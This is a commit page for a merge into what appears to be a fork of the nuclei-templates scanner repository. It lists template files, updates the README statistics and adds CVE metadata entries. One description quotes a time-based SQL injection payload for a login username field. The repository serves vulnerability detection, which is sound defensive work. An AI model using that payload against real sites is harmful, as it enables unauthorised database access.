Merge branch 'projectdiscovery:main' into main

patch-1
Arm!tage 2023-08-16 16:31:03 +08:00 committed by GitHub
commit ea1bd7fbb2
128 changed files with 5687 additions and 3897 deletions


@ -1,164 +1,8 @@
file/malware/aar-malware.yaml
file/malware/adzok-malware.yaml
file/malware/alfa-malware.yaml
file/malware/alienspy-malware.yaml
file/malware/alina-malware.yaml
file/malware/alpha-malware.yaml
file/malware/andromeda-malware.yaml
file/malware/ap0calypse-malware.yaml
file/malware/arcom-malware.yaml
file/malware/arkei-malware.yaml
file/malware/backoff-malware.yaml
file/malware/bandook-malware.yaml
file/malware/blacknix-malware.yaml
file/malware/blackworm-malware.yaml
file/malware/bluebanana-malware.yaml
file/malware/bozok-malware.yaml
file/malware/bublik-malware.yaml
file/malware/cap-hookexkeylogger-malware.yaml
file/malware/cerberus-malware.yaml
file/malware/clientmesh-malware.yaml
file/malware/crimson-malware.yaml
file/malware/cryptxxx-dropper-malware.yaml
file/malware/cryptxxx-malware.yaml
file/malware/cxpid-malware.yaml
file/malware/cythosia-malware.yaml
file/malware/darkrat-malware.yaml
file/malware/ddostf-malware.yaml
file/malware/derkziel-malware.yaml
file/malware/dexter-malware.yaml
file/malware/diamondfox-malware.yaml
file/malware/dmalocker-malware.yaml
file/malware/doublepulsar-malware.yaml
file/malware/eicar-malware.yaml
file/malware/erebus-malware.yaml
file/malware/ezcob-malware.yaml
file/malware/fudcrypt-malware.yaml
file/malware/gafgyt-bash-malware.yaml
file/malware/gafgyt-generic-malware.yaml
file/malware/gafgyt-hihi-malware.yaml
file/malware/gafgyt-hoho-malware.yaml
file/malware/gafgyt-jackmy-malware.yaml
file/malware/gafgyt-oh-malware.yaml
file/malware/genome-malware.yaml
file/malware/glass-malware.yaml
file/malware/glasses-malware.yaml
file/malware/gozi-malware.yaml
file/malware/gpgqwerty-malware.yaml
file/malware/greame-malware.yaml
file/malware/grozlex-malware.yaml
file/malware/hawkeye-malware.yaml
file/malware/imminent-malware.yaml
file/malware/infinity-malware.yaml
file/malware/insta11-malware.yaml
file/malware/intel-virtualization-malware.yaml
file/malware/iotreaper-malware.yaml
file/malware/linux-aesddos-malware.yaml
file/malware/linux-billgates-malware.yaml
file/malware/linux-elknot-malware.yaml
file/malware/linux-mrblack-malware.yaml
file/malware/linux-tsunami-malware.yaml
file/malware/locky-malware.yaml
file/malware/lostdoor-malware.yaml
file/malware/luminositylink-malware.yaml
file/malware/luxnet-malware.yaml
file/malware/macgyver-installer-malware.yaml
file/malware/macgyver-malware.yaml
file/malware/madness-malware.yaml
file/malware/miner--malware.yaml
file/malware/miniasp3-malware.yaml
file/malware/naikon-malware.yaml
file/malware/naspyupdate-malware.yaml
file/malware/notepad-malware.yaml
file/malware/olyx-malware.yaml
file/malware/osx-leverage-malware.yaml
file/malware/paradox-malware.yaml
file/malware/plasma-malware.yaml
file/malware/poetrat-malware.yaml
file/malware/pony-malware.yaml
file/malware/pubsab-malware.yaml
file/malware/punisher-malware.yaml
file/malware/pypi-malware.yaml
file/malware/pythorat-malware.yaml
file/malware/qrat-malware.yaml
file/malware/satana-dropper-malware.yaml
file/malware/satana-malware.yaml
file/malware/shimrat-malware.yaml
file/malware/shimratreporter-malware.yaml
file/malware/sigma-malware.yaml
file/malware/smallnet-malware.yaml
file/malware/snake-malware.yaml
file/malware/sub7nation-malware.yaml
file/malware/t5000-malware.yaml
file/malware/tedroo-malware.yaml
file/malware/terminator-malware.yaml
file/malware/teslacrypt-malware.yaml
file/malware/tox-malware.yaml
file/malware/treasurehunt-malware.yaml
file/malware/trickbot-malware.yaml
file/malware/trumpbot-malware.yaml
file/malware/universal-1337-malware.yaml
file/malware/unrecom-malware.yaml
file/malware/urausy-malware.yaml
file/malware/vertex-malware.yaml
file/malware/virusrat-malware.yaml
file/malware/wabot-malware.yaml
file/malware/warp-malware.yaml
file/malware/xhide-malware.yaml
file/malware/xor-ddos-malware.yaml
file/malware/yayih-malware.yaml
file/malware/zeghost-malware.yaml
file/malware/zoxpng-malware.yaml
http/cnvd/2021/CNVD-2021-41972.yaml
http/cnvd/2021/CNVD-2021-43984.yaml
http/cves/2018/CVE-2018-12909.yaml
http/cves/2018/CVE-2018-18809.yaml
http/cves/2018/CVE-2018-7653.yaml
http/cves/2019/CVE-2019-14750.yaml
http/cves/2019/CVE-2019-16057.yaml
http/cves/2019/CVE-2019-7192.yaml
http/cves/2022/CVE-2022-0169.yaml
http/cves/2022/CVE-2022-2414.yaml
http/cves/2022/CVE-2022-40843.yaml
http/cves/2023/CVE-2023-1698.yaml
http/cves/2023/CVE-2023-22478.yaml
http/cves/2023/CVE-2023-22480.yaml
http/cves/2023/CVE-2023-32117.yaml
http/cves/2023/CVE-2023-35082.yaml
http/cves/2023/CVE-2023-37580.yaml
http/cves/2023/CVE-2023-39120.yaml
http/cves/2023/CVE-2023-39143.yaml
http/default-logins/bloofoxcms-default-login.yaml
http/exposed-panels/acenet-panel.yaml
http/exposed-panels/bloofoxcms-login-panel.yaml
http/exposed-panels/discuz-panel.yaml
http/exposed-panels/kodak-network-panel.yaml
http/exposed-panels/mpsec-isg1000-panel.yaml
http/exposures/files/socks5-vpn-config.yaml
http/misconfiguration/bitbucket-auth-bypass.yaml
http/misconfiguration/casdoor-users-password.yaml
http/misconfiguration/clickhouse-unauth-api.yaml
http/misconfiguration/installer/yzmcms-installer.yaml
http/misconfiguration/mobsf-framework-exposure.yaml
http/misconfiguration/openstack-config.yaml
http/misconfiguration/oracle-reports-services.yaml
http/misconfiguration/sonarqube-projects-disclosure.yaml
http/vulnerabilities/apache/apache-solr-rce.yaml
http/vulnerabilities/bsphp-info.yaml
http/vulnerabilities/discuz/discuz-api-pathinfo.yaml
http/vulnerabilities/joomla/joomla-department-sqli.yaml
http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml
http/vulnerabilities/netmizer/netmizer-data-listing.yaml
http/vulnerabilities/other/acti-video-lfi.yaml
http/vulnerabilities/other/avcon6-execl-lfi.yaml
http/vulnerabilities/other/avcon6-lfi.yaml
http/vulnerabilities/other/clodop-printer-lfi.yaml
http/vulnerabilities/other/easyimage-downphp-lfi.yaml
http/vulnerabilities/other/kodak-network-lfi.yaml
http/vulnerabilities/other/sangfor-cphp-rce.yaml
http/vulnerabilities/other/sangfor-download-lfi.yaml
http/vulnerabilities/other/sangfor-sysuser-conf.yaml
http/vulnerabilities/wordpress/photo-gallery-xss.yaml
http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml
http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml
http/vulnerabilities/zzzcms/zzzcms-xss.yaml
http/cves/2021/CVE-2021-24409.yaml
http/cves/CVE-2015-9323.yaml
http/technologies/besu-server-detect.yaml
http/technologies/erigon-server-detect.yaml
http/technologies/geth-server-detect.yaml
http/technologies/nethermind-server-detect.yaml
network/jarm/c2/havoc-c2-jarm.yaml
ssl/c2/havoc-c2.yaml
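Review bot: `http/cves/CVE-2015-9323.yaml` on what appears to be the new side of this list (the last eight entries, assuming the 164 removed lines print before the 8 added ones) sits directly under `http/cves/` with no year directory, unlike `http/cves/2021/CVE-2021-24409.yaml` on the line above it and every `file_path` in the cves.json hunks further down, which all use `http/cves/<year>/`. If the template really lives at that path, anything that indexes templates by year directory may skip it, so the entry (and the file) should probably be `http/cves/2015/CVE-2015-9323.yaml`. Worth confirming against the actual file location in the tree, since this page shows only the list.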


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
| cve | 1992 | dhiyaneshdk | 1011 | http | 6158 | info | 3054 | file | 185 |
| panel | 966 | dwisiswant0 | 798 | workflows | 190 | medium | 1242 | dns | 17 |
| wordpress | 817 | daffainfo | 664 | file | 185 | high | 1225 | | |
| exposure | 764 | pikpikcu | 353 | network | 115 | critical | 737 | | |
| wp-plugin | 707 | pdteam | 281 | ssl | 24 | low | 223 | | |
| xss | 706 | pussycat0x | 276 | dns | 17 | unknown | 27 | | |
| osint | 666 | ritikchaddha | 229 | headless | 9 | | | | |
| tech | 623 | ricardomaia | 221 | TEMPLATES-STATS.json | 1 | | | | |
| edb | 598 | geeknik | 221 | contributors.json | 1 | | | | |
| lfi | 560 | 0x_akoko | 179 | cves.json | 1 | | | | |
| cve | 2017 | dhiyaneshdk | 1045 | http | 6232 | info | 3185 | file | 309 |
| panel | 974 | dwisiswant0 | 798 | file | 309 | high | 1261 | dns | 17 |
| wordpress | 820 | daffainfo | 787 | workflows | 190 | medium | 1251 | | |
| exposure | 777 | pikpikcu | 353 | network | 115 | critical | 752 | | |
| xss | 713 | pussycat0x | 284 | ssl | 24 | low | 228 | | |
| wp-plugin | 711 | pdteam | 282 | dns | 17 | unknown | 29 | | |
| osint | 666 | ritikchaddha | 244 | headless | 9 | | | | |
| tech | 623 | geeknik | 221 | TEMPLATES-STATS.json | 1 | | | | |
| edb | 598 | ricardomaia | 221 | contributors.json | 1 | | | | |
| lfi | 579 | theamanrawat | 179 | cves.json | 1 | | | | |
**468 directories, 6939 files**.
**475 directories, 7137 files**.
</td>
</tr>




@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
| cve | 1992 | dhiyaneshdk | 1011 | http | 6158 | info | 3054 | file | 185 |
| panel | 966 | dwisiswant0 | 798 | workflows | 190 | medium | 1242 | dns | 17 |
| wordpress | 817 | daffainfo | 664 | file | 185 | high | 1225 | | |
| exposure | 764 | pikpikcu | 353 | network | 115 | critical | 737 | | |
| wp-plugin | 707 | pdteam | 281 | ssl | 24 | low | 223 | | |
| xss | 706 | pussycat0x | 276 | dns | 17 | unknown | 27 | | |
| osint | 666 | ritikchaddha | 229 | headless | 9 | | | | |
| tech | 623 | ricardomaia | 221 | TEMPLATES-STATS.json | 1 | | | | |
| edb | 598 | geeknik | 221 | contributors.json | 1 | | | | |
| lfi | 560 | 0x_akoko | 179 | cves.json | 1 | | | | |
| cve | 2017 | dhiyaneshdk | 1045 | http | 6232 | info | 3185 | file | 309 |
| panel | 974 | dwisiswant0 | 798 | file | 309 | high | 1261 | dns | 17 |
| wordpress | 820 | daffainfo | 787 | workflows | 190 | medium | 1251 | | |
| exposure | 777 | pikpikcu | 353 | network | 115 | critical | 752 | | |
| xss | 713 | pussycat0x | 284 | ssl | 24 | low | 228 | | |
| wp-plugin | 711 | pdteam | 282 | dns | 17 | unknown | 29 | | |
| osint | 666 | ritikchaddha | 244 | headless | 9 | | | | |
| tech | 623 | geeknik | 221 | TEMPLATES-STATS.json | 1 | | | | |
| edb | 598 | ricardomaia | 221 | contributors.json | 1 | | | | |
| lfi | 579 | theamanrawat | 179 | cves.json | 1 | | | | |


@ -428,6 +428,7 @@
{"ID":"CVE-2017-7615","Info":{"Name":"MantisBT \u003c=2.30 - Arbitrary Password Reset/Admin Access","Severity":"high","Description":"MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2017/CVE-2017-7615.yaml"}
{"ID":"CVE-2017-7921","Info":{"Name":"Hikvision - Authentication Bypass","Severity":"critical","Description":"Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices contain an improper authentication issue. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2017/CVE-2017-7921.yaml"}
{"ID":"CVE-2017-7925","Info":{"Name":"Dahua Security - Configuration File Disclosure","Severity":"critical","Description":"A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-7925.yaml"}
{"ID":"CVE-2017-8229","Info":{"Name":"Amcrest IP Camera Web Management - Data Exposure","Severity":"critical","Description":"Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-8229.yaml"}
{"ID":"CVE-2017-8917","Info":{"Name":"Joomla! \u003c3.7.1 - SQL Injection","Severity":"critical","Description":"Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-8917.yaml"}
{"ID":"CVE-2017-9140","Info":{"Name":"Reflected XSS - Telerik Reporting Module","Severity":"medium","Description":"Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-9140.yaml"}
{"ID":"CVE-2017-9288","Info":{"Name":"WordPress Raygun4WP \u003c=1.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Raygun4WP 1.8.0 contains a reflected cross-site scripting vulnerability via sendtesterror.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-9288.yaml"}
@ -645,6 +646,7 @@
{"ID":"CVE-2019-15043","Info":{"Name":"Grafana - Improper Access Control","Severity":"high","Description":"Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-15043.yaml"}
{"ID":"CVE-2019-15107","Info":{"Name":"Webmin \u003c= 1.920 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Webmin \u003c=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-15107.yaml"}
{"ID":"CVE-2019-15501","Info":{"Name":"L-Soft LISTSERV \u003c16.5-2018a - Cross-Site Scripting","Severity":"medium","Description":"L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15501.yaml"}
{"ID":"CVE-2019-15642","Info":{"Name":"Webmin \u003c 1.920 - Authenticated Remote Code Execution","Severity":"high","Description":"rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states \"RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users.\"\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2019/CVE-2019-15642.yaml"}
{"ID":"CVE-2019-15713","Info":{"Name":"WordPress My Calendar \u003c= 3.1.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin My Calendar \u003c= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15713.yaml"}
{"ID":"CVE-2019-15811","Info":{"Name":"DomainMOD \u003c=4.13.0 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15811.yaml"}
{"ID":"CVE-2019-15858","Info":{"Name":"WordPress Woody Ad Snippets \u003c2.2.5 - Cross-Site Scripting/Remote Code Execution","Severity":"high","Description":"WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-15858.yaml"}
@ -897,6 +899,7 @@
{"ID":"CVE-2020-27866","Info":{"Name":"NETGEAR - Authentication Bypass","Severity":"high","Description":"NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-27866.yaml"}
{"ID":"CVE-2020-27982","Info":{"Name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-27982.yaml"}
{"ID":"CVE-2020-27986","Info":{"Name":"SonarQube - Authentication Bypass","Severity":"high","Description":"SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,\nSVN, and GitLab credentials via the api/settings/values URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-27986.yaml"}
{"ID":"CVE-2020-28185","Info":{"Name":"TerraMaster TOS \u003c 4.2.06 - User Enumeration","Severity":"medium","Description":"User Enumeration vulnerability in TerraMaster TOS \u003c= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2020/CVE-2020-28185.yaml"}
{"ID":"CVE-2020-28188","Info":{"Name":"TerraMaster TOS - Unauthenticated Remote Command Execution","Severity":"critical","Description":"TerraMaster TOS \u003c= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-28188.yaml"}
{"ID":"CVE-2020-28208","Info":{"Name":"Rocket.Chat \u003c3.9.1 - Information Disclosure","Severity":"medium","Description":"Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-28208.yaml"}
{"ID":"CVE-2020-28351","Info":{"Name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","Severity":"medium","Description":"Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING\u0026 page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-28351.yaml"}
@ -1042,6 +1045,7 @@
{"ID":"CVE-2021-22205","Info":{"Name":"GitLab CE/EE - Remote Code Execution","Severity":"critical","Description":"GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-\u003chash\u003e.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2021/CVE-2021-22205.yaml"}
{"ID":"CVE-2021-22214","Info":{"Name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","Severity":"high","Description":"GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:\n- CVE-2021-39935\n- CVE-2021-22214\n- CVE-2021-22175\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2021/CVE-2021-22214.yaml"}
{"ID":"CVE-2021-22502","Info":{"Name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","Severity":"critical","Description":"Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22502.yaml"}
{"ID":"CVE-2021-22707","Info":{"Name":"EVlink City \u003c R8 V3.4.0.1 - Authentication Bypass","Severity":"critical","Description":"A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-22707.yaml"}
{"ID":"CVE-2021-22873","Info":{"Name":"Revive Adserver \u003c5.1.0 - Open Redirect","Severity":"medium","Description":"Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-22873.yaml"}
{"ID":"CVE-2021-22911","Info":{"Name":"Rocket.Chat \u003c=3.13 - NoSQL Injection","Severity":"critical","Description":"Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22911.yaml"}
{"ID":"CVE-2021-22986","Info":{"Name":"F5 iControl REST - Remote Command Execution","Severity":"critical","Description":"F5 iControl REST interface is susceptible to remote command execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. This affects BIG-IP 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3; and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22986.yaml"}
@ -1087,6 +1091,7 @@
{"ID":"CVE-2021-24389","Info":{"Name":"WordPress FoodBakery \u003c2.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress FoodBakery before 2.2 contains an unauthenticated reflected cross-site scripting vulnerability. It does not properly sanitize the foodbakery_radius parameter before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24389.yaml"}
{"ID":"CVE-2021-24406","Info":{"Name":"WordPress wpForo Forum \u003c 1.9.7 - Open Redirect","Severity":"medium","Description":"WordPress wpForo Forum \u003c 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24406.yaml"}
{"ID":"CVE-2021-24407","Info":{"Name":"WordPress Jannah Theme \u003c5.4.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24407.yaml"}
{"ID":"CVE-2021-24409","Info":{"Name":"Prismatic \u003c 2.8 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24409.yaml"}
{"ID":"CVE-2021-24435","Info":{"Name":"WordPress Titan Framework plugin \u003c= 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24435.yaml"}
{"ID":"CVE-2021-24436","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24436.yaml"}
{"ID":"CVE-2021-24452","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24452.yaml"}
@ -1561,6 +1566,7 @@
{"ID":"CVE-2022-24265","Info":{"Name":"Cuppa CMS v1.0 - SQL injection","Severity":"high","Description":"Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/\u0026menu_filter=3 parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24265.yaml"}
{"ID":"CVE-2022-24266","Info":{"Name":"Cuppa CMS v1.0 - SQL injection","Severity":"high","Description":"Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24266.yaml"}
{"ID":"CVE-2022-24288","Info":{"Name":"Apache Airflow OS Command Injection","Severity":"high","Description":"Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-24288.yaml"}
{"ID":"CVE-2022-24384","Info":{"Name":"SmarterTools SmarterTrack - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24384.yaml"}
{"ID":"CVE-2022-2462","Info":{"Name":"WordPress Transposh \u003c=1.0.8.1 - Information Disclosure","Severity":"medium","Description":"WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-2462.yaml"}
{"ID":"CVE-2022-2467","Info":{"Name":"Garage Management System 1.0 - SQL Injection","Severity":"critical","Description":"Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-2467.yaml"}
{"ID":"CVE-2022-24681","Info":{"Name":"ManageEngine ADSelfService Plus \u003c6121 - Stored Cross-Site Scripting","Severity":"medium","Description":"ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24681.yaml"}
@ -1816,6 +1822,7 @@
{"ID":"CVE-2022-46073","Info":{"Name":"Helmet Store Showroom - Cross Site Scripting","Severity":"medium","Description":"Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS).\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46073.yaml"}
